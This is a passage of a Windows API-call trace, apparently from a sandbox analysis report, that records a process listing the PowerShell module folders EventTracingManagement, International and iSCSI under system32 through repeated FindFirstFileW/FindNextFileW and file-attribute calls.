lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0227.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0227.888] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd22b0 [0227.889] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.889] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0227.889] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.889] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.890] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.890] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.890] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.890] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0227.890] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0227.891] FindNextFileW (in: hFindFile=0x25b73cd22b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 0 [0227.891] FindClose (in: hFindFile=0x25b73cd22b0 | out: hFindFile=0x25b73cd22b0) returned 1 [0227.891] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1")) returned 0x20 [0227.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0227.891] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1110 [0227.892] FindNextFileW (in: hFindFile=0x25b73cd1110, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.892] FindNextFileW (in: hFindFile=0x25b73cd1110, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0227.892] FindNextFileW (in: hFindFile=0x25b73cd1110, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 0 [0227.892] FindClose (in: hFindFile=0x25b73cd1110 | out: hFindFile=0x25b73cd1110) returned 1 [0227.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0227.893] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1ad0 [0227.893] FindNextFileW (in: hFindFile=0x25b73cd1ad0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.893] FindNextFileW (in: hFindFile=0x25b73cd1ad0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0227.893] FindNextFileW (in: hFindFile=0x25b73cd1ad0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.893] FindClose (in: hFindFile=0x25b73cd1ad0 | out: hFindFile=0x25b73cd1ad0) returned 1 [0227.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0227.894] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0227.894] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1cb0 [0227.894] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.895] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0227.895] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 0 [0227.895] FindClose (in: hFindFile=0x25b73cd1cb0 | out: hFindFile=0x25b73cd1cb0) returned 1 [0227.895] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1")) returned 0x20 [0227.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0227.896] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2370 [0227.896] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.896] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0227.896] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0227.897] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0227.897] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0227.897] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0227.897] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 0 [0227.897] FindClose (in: hFindFile=0x25b73cd2370 | out: hFindFile=0x25b73cd2370) returned 1 [0227.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0227.898] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd11d0 [0227.898] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.898] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0227.898] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0227.899] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0227.899] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0227.899] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, 